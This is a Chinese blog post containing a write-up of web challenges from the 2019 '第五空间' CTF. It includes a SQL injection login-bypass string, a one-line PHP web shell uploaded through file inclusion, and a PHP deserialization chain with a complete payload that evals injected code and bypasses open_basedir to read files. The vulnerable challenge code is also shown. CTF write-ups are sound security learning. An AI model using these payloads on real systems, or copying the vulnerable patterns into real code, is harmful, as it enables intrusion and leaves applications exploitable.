<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>第五空间Writeup_Web | Lethe | 忘川</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="Lethe">
  <meta name="keywords" content="Lethe's Blog">
  <meta name="description" content="Lethe's Blog">
  <script id="hexo-configurations">
  var CONFIG = {
    root: '/',
    theme: 'lx',
    version: '1.4.5',
    localsearch:{
      "enable": false,
      "trigger": "auto",
      "top_n_per_article": 1,
      "unescape": false,
      "preload": false
      },
    path: '-'
  };
</script>

  <link rel="shortcut icon" href="/hacker.png">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.jside.menu.js"></script>
	<script>
	$(document).ready(function(){
	$(".menu-container").jSideMenu({
	    jSidePosition: "position-right",
	    jSideSticky: true,
	    jSideSkin: "between-clouds",
	     });
	}); 
	</script>
  
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:300|Noto+Serif+SC&amp;display=swap">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4/css/font-awesome.min.css">
</head>
<body>
<div class="single">
<div id="page">
<div id="lx-aside" style="background-image: url(/images/page-cover.jpg)" data-stellar-background-ratio="0.5">
  <div class="overlay">
  <div class="page-title">
    <div class="avatar"><a href="/"><img src="/images/2.jpg"></a></div>
    <span>2019-09-01</span>
    <h2>第五空间Writeup_Web</h2>
    <div class="tags"><i class="fa fa-tag"></i><a class="tag-link" href="/tags/Writeup/">Writeup</a></div>
    <div class="social-links">
<a href="https://github.com/yourname" target="_blank"><i class="fa fa-github fa-fw"></i></a><a href="mailto:your@email.address"><i class="fa fa-envelope fa-fw"></i></a>
</div></div>
</div>
</div>
<div id="lx-main-content">
  <div class="lx-post">
    <div class="lx-entry padding">
      <div>
        <h1 id="空相"><a href="#空相" class="headerlink" title="空相"></a>空相</h1><p>（1）进入页面，提示了参数id </p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903160325343.png" alt="在这里插入图片描述"></p>
<p>（2）尝试一下：?id=1‘<br><img src="/2019/09/01/第五空间Writeup-Web/20190903160348218.png" alt="在这里插入图片描述"></p>
<p>（3）访问该文件，并加上队伍的token作为参数即可，<br><img src="/2019/09/01/第五空间Writeup-Web/2019090316072259.png" alt="在这里插入图片描述"></p>
<p><br></p>
<h1 id="五叶"><a href="#五叶" class="headerlink" title="五叶"></a>五叶</h1><p>（1）进入后，是一个登陆界面</p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903160801767.png" alt="在这里插入图片描述"><br>（2）这一题比较脑洞，实际上是用万能密码来进行登陆admin账号。</p>
<ul>
<li><p>经过测试：过滤了*、=、and、or、from、select、union、insert、update等，单引号加括号闭合。</p>
</li>
<li><p>猜测后台sql语句可能为：<code>select * form xxx where password = (‘$password’);</code></p>
</li>
<li><p>于是构造密码为：<code>1’) || username like ‘admin’--</code>（最后有个空格）</p>
</li>
<li><p>拼接后为： <code>….  where password =(‘1’) || username=&#39;admin&#39; --</code></p>
</li>
</ul>
<p><img src="/2019/09/01/第五空间Writeup-Web/2019090316091050.png" alt="在这里插入图片描述"></p>
<p><br></p>
<h1 id="六尘（非预期）"><a href="#六尘（非预期）" class="headerlink" title="六尘（非预期）"></a>六尘（非预期）</h1><p>（1）扫目录得到/log/</p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903160951628.png" alt="在这里插入图片描述"></p>
<p>（2）访问如下，可以直接看到access.log的内容：</p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903161003750.png" alt="在这里插入图片描述"></p>
<p>（3）在access.log日志中搜索关键词flag，发现存在flagishere目录，访问里面的文件，并替换token即可。</p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903161018938.png" alt="在这里插入图片描述"></p>
<p><strong>预期解</strong>：通过SSRF扫描端口 + gopher协议攻击内网的Struts2，题目环境开的时间太短了，没来得及复现..</p>
<p><br></p>
<h1 id="空性"><a href="#空性" class="headerlink" title="空性"></a>空性</h1><p>（1）进入后，是一个登陆界面，发现这里右键查看不了代码（用了一段JS代码实现的），F12或BP抓包看到如下一段JS代码，用户名和密码均为Youguess，但实际上我们直接访问那个文件即可。<br><img src="/2019/09/01/第五空间Writeup-Web/2019090316112880.png" alt="在这里插入图片描述"></p>
<p>（2）访问./151912db206ee052.php，页面上除了显示“听说你的Linux用的很6？”这句话以外，得不到任何有用信息，于是考虑文件泄露。</p>
<p>Linux下的vim编辑器在非正常退出的情况下会自动生成swp后缀的备份文件，由于此类格式文件无法解析，此时便可以通过浏览器直接下载此敏感文件，这导致程序的源码泄漏。</p>
<p>（3）于是访问 xxx/.151912db206ee052.php.swp下载文件，并通过命令<code>vi –r [文件名]</code>进行恢复。</p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903161215948.png" alt="在这里插入图片描述"></p>
<p>（4）审计代码如下：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">error_reporting(<span class="number">0</span>);  </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">First</span></span>&#123;  </span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">firstlevel</span><span class="params">()</span></span>&#123;  </span><br><span class="line">        $a=<span class="string">'whoami'</span>;  </span><br><span class="line">        extract($_GET);  </span><br><span class="line">        $fname = $_GET[<span class="string">'fname'</span>]?$_GET[<span class="string">'fname'</span>]:<span class="string">'./js/ctf.js'</span>;  </span><br><span class="line">        $content=trim(file_get_contents($fname));  </span><br><span class="line">        <span class="keyword">if</span>($a==$content)  </span><br><span class="line">        &#123;  </span><br><span class="line">                <span class="keyword">echo</span> <span class="string">'ok'</span>;;  </span><br><span class="line">        <span class="keyword">else</span>  </span><br><span class="line">        &#123;  </span><br><span class="line">                <span class="keyword">echo</span> <span class="string">'听说你的Linux用的很6？'</span>;  </span><br><span class="line">        &#125;  </span><br><span class="line">  &#125;  </span><br><span class="line">&#125;  </span><br><span class="line">$execfirst = <span class="keyword">new</span> First();  </span><br><span class="line">$execfirst -&gt; firstlevel();  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<ul>
<li><p>利用方式一：PHP伪协议——php://input，所以构造：<code>?fname=php://input</code>，并POST数据：<code>whoami</code></p>
</li>
<li><p>利用方式二：变量覆盖——extract()，注意到<code>$a==$content</code>进行的是松散比较，所以构造payload：<code>?a=&amp; fname=lethe</code><br><img src="/2019/09/01/第五空间Writeup-Web/20190903161506717.png" alt="在这里插入图片描述"></p>
</li>
</ul>
<p>（5）上一层成功绕过后，会进入到一个上传界面，通过白名单严格的限制了上传文件的后缀，且对文件内容中的eval()、system()、 phpinfo()等许多函数进行了检测，所以想按一般的文件上传getshell是不行的。</p>
<p> fuzz+脑洞，发现可以上传html后缀的文件，但是上传html文件有什么用呢，并不能解析其中的php代码。</p>
<p>看到url中的参数有<code>file=xxxxxx</code>这个参数，很像文件包含的题目形式。</p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903161552691.png" alt="在这里插入图片描述"></p>
<p>测试发现<code>http://111.33.164.6:10003/3792689baaabc7eb</code>本身就是一个上传页面，猜测存在文件包含。</p>
<p>于是构造html文件的内容为：<code>&lt;?php $f = $_GET[f]; $f($_GET[s]); ?&gt;</code>         </p>
<p>上传后，修改url中file参数的值，<code>?file=upload/xxxxxxxx</code>（上传的文件目录，去掉文件后缀），然后传入相应参数，即可getshell。</p>
<p><br></p>
<h1 id="八苦"><a href="#八苦" class="headerlink" title="八苦"></a>八苦</h1><p>这一题下午的时候坏了，一直到最后都没修复好…</p>
<p>（1）进入后发现页面上，只有一个welcome，最后扫描发现是<code>.phps</code>上有源码如下：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">	<span class="comment">// flag.php in /var/html/www</span></span><br><span class="line"></span><br><span class="line">	error_reporting(<span class="number">0</span>);</span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">		<span class="keyword">protected</span> $careful;</span><br><span class="line">        <span class="keyword">public</span> $securuty;</span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;careful===<span class="number">1</span>)&#123;</span><br><span class="line">				phpinfo();	<span class="comment">// step 1:	read source,get phpinfo and read it carefullt</span></span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span><span class="params">($name)</span></span>&#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="keyword">$this</span>-&gt;securuty[$name];</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span><span class="params">($param1,$param2)</span></span>&#123;</span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;&#123;$param1&#125;)&#123;</span><br><span class="line">                <span class="keyword">eval</span>(<span class="string">'$a='</span>.$_GET[<span class="string">'dangerous'</span>].<span class="string">';'</span>);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">User</span></span>&#123;</span><br><span class="line">		<span class="keyword">public</span> $user;</span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;user=<span class="keyword">new</span> Welcome();</span><br><span class="line">			<span class="keyword">$this</span>-&gt;user-&gt;say_hello();  </span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	$a=serialize(<span class="keyword">new</span> User);</span><br><span class="line">	$string=$_GET[<span class="string">'foo'</span>]??$a;</span><br><span class="line">	unserialize($string);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>（2）看样子是一道反序列化的题目了，注释中提示了先仔细看phpinfo的内容，于是想办法先执行phpinfo()。</p>
<p>可以看到，这段代码里没有文件包含，也没有定义Welcome类，但是却在User类里实例化了Welcome类，所以应该是phpinfo中隐藏了信息。</p>
<p>所以，看phpinfo的脚本如下：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">		<span class="keyword">protected</span> $careful;</span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">		</span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;careful = <span class="number">1</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	$a=<span class="keyword">new</span> Test;</span><br><span class="line">	<span class="keyword">echo</span> urlencode(serialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>（3）然后经过一系列操作得到第二段代码，如下：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Welcome</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">say_hello</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"welcome&lt;br&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Welcome_again</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $willing ;</span><br><span class="line">    <span class="keyword">public</span> $action ;  <span class="comment">//action=new Test;</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;action=<span class="keyword">new</span> Welcome;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;willing)&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;action-&gt;say_hello();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>整个利用过程，和QWB2019的upload那一题差不多，</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Welcome_again =&gt; ___destruct</span><br><span class="line">Test =&gt; __call</span><br><span class="line">Test =&gt; __get</span><br><span class="line">eval()</span><br></pre></td></tr></table></figure>
<p>脚本如下：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Welcome_again</span></span>&#123;</span><br><span class="line">        <span class="keyword">public</span> $willing ;</span><br><span class="line">        <span class="keyword">public</span> $action ;  </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;action = <span class="keyword">new</span> Test();</span><br><span class="line">            <span class="keyword">$this</span>-&gt;willing = <span class="number">1</span>;             <span class="comment">//过if判断</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;willing)&#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;action-&gt;say_hello(); <span class="comment">//调用Test::__call</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> $careful;</span><br><span class="line">        <span class="keyword">public</span> $securuty;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;securuty = [<span class="string">'say_hello'</span> =&gt; <span class="number">1</span>];   </span><br><span class="line">            <span class="keyword">$this</span>-&gt;careful = <span class="number">0</span>;                </span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span><span class="params">($name)</span></span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;securuty[$name];        <span class="comment">//返回1</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span><span class="params">($param1,$param2)</span></span>&#123;  <span class="comment">//param1=say_hello</span></span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;&#123;$param1&#125;)&#123;                 <span class="comment">//调用Test::__get</span></span><br><span class="line">                <span class="comment">//eval('$a='.$_GET['dangerous'].';');</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $a = <span class="keyword">new</span> Welcome_again();</span><br><span class="line">    <span class="keyword">echo</span> urlencode(serialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>得到payload:<br><code>?foo=O%3A13%3A%22Welcome_again%22%3A2%3A%7Bs%3A7%3A%22willing%22%3Bi%3A1%3Bs%3A6%3A%22action%22%3BO%3A4%3A%22Test%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00careful%22%3Bi%3A0%3Bs%3A8%3A%22securuty%22%3Ba%3A1%3A%7Bs%3A9%3A%22say_hello%22%3Bi%3A1%3B%7D%7D%7D</code></p>
<p>同时通过dangerous参数传入命令，注意要用<code>;</code>闭合前面的赋值语句。</p>
<p>（4）最后在读flag的时候好像还要bypass open_basedir。</p>
<p>可以参考：<a href="https://skysec.top/2019/04/12/%E4%BB%8EPHP%E5%BA%95%E5%B1%82%E7%9C%8Bopen-basedir-bypass/" target="_blank" rel="noopener">从PHP底层看open-basedir-bypass</a></p>
<p><img src="/2019/09/01/第五空间Writeup-Web/20190903163125433.png" alt="在这里插入图片描述"></p>
<p>最终payload：</p>
<p><code>?foo=O%3A13%3A%22Welcome_again%22%3A2%3A%7Bs%3A7%3A%22willing%22%3Bi%3A1%3Bs%3A6%3A%22action%22%3BO%3A4%3A%22Test%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00careful%22%3Bi%3A0%3Bs%3A8%3A%22securuty%22%3Ba%3A1%3A%7Bs%3A9%3A%22say_hello%22%3Bi%3A1%3B%7D%7D%7D&amp;dangerous=1;chdir(&#39;/tmp&#39;);mkdir(&#39;sky&#39;);chdir(&#39;sky&#39;);ini_set(&#39;open_basedir&#39;,&#39;..&#39;);chdir(&#39;..&#39;);chdir(&#39;..&#39;);chdir(&#39;..&#39;);chdir(&#39;..&#39;);ini_set(&#39;open_basedir&#39;,&#39;/&#39;);echo(file_get_contents(&#39;/var/www/flag.php&#39;));</code></p>

      </div>
    </div>
  </div>
</div>
<div class="lx-navigation">
	<div class="lx-cover prev lx-cover-sm" style="background-image: url(/images/footer_1.jpg)">
		<div class="overlay"></div>
		<a class="copy" href="/2019/09/06/利用SoapClient类进行SSRF-CRLF攻击/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Next</span>
						<h3>利用SoapClient类进行SSRF+CRLF攻击</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
        <div class="lx-cover next lx-cover-sm" style="background-image: url(/images/footer_2.jpg)">
		<div class="overlay"></div>
		<a class="copy" href="/2019/08/26/SUCTF-2019-部分复现/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Prev</span>
						<h3>SUCTF_2019_部分复现</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
</div>
</div>
<div class="comment"><div id="comments"></div></div>
<footer>
  <div>
  Copyright &copy; 2019.<a href="/">Lethe | 忘川</a><br>Powered by <a href="https://hexo.io" target="_blank">Hexo</a> | Theme <a href="https://lx.blleng.cn" target="_blank">Lx</a><br>
  </div>
</footer>
</div>

<button class="menu-trigger"></button>
<div class="menu">
  <div class="menu-head">
    <span class="layer">
      <div class="col">
        <div class="row for-pic">
          <div class="profile-pic">
            <a href="/"><img src="/images/2.jpg" alt="Lethe"></a>
          </div>
        </div>
        <div class="row for-name">
          <p>Lethe</p>
          <span class="tagline">Hello, World!</span>
        </div>
      </div>
    </span>
  </div>
  <nav class="menu-container">
  <ul class="menu-items">
    <li><a href="/"><i class="fa fa-home fa-fw"></i>首页</a></li>
    <li><a href="/archives/"><i class="fa fa-archive fa-fw"></i>归档</a></li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-bookmark fa-fw"></i>页面</span>
        <ul>
          <li><a href="/about">关于</a></li>
        </ul>
    </li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-link fa-fw"></i>友链</span>
        <ul>
          <li> <a href="https://hiworldalice.github.io/" target="_blank">Tunt</a></li>
        <li> <a href="https://3nd.xyz" target="_blank">3ND</a></li>
        </ul>
    </li>
  </ul>
  </nav>
</div>

<div class="gototop js-top">
  <a href="#" class="js-gotop"><i class="fa fa-arrow-up"></i></a>
</div>
<script src="/js/jquery.easing.min.js"></script>
<script src="/js/jquery.waypoints.min.js"></script>
<script src="/js/jquery.stellar.min.js"></script>
<script src="/js/main.js"></script>



</body>
</html>
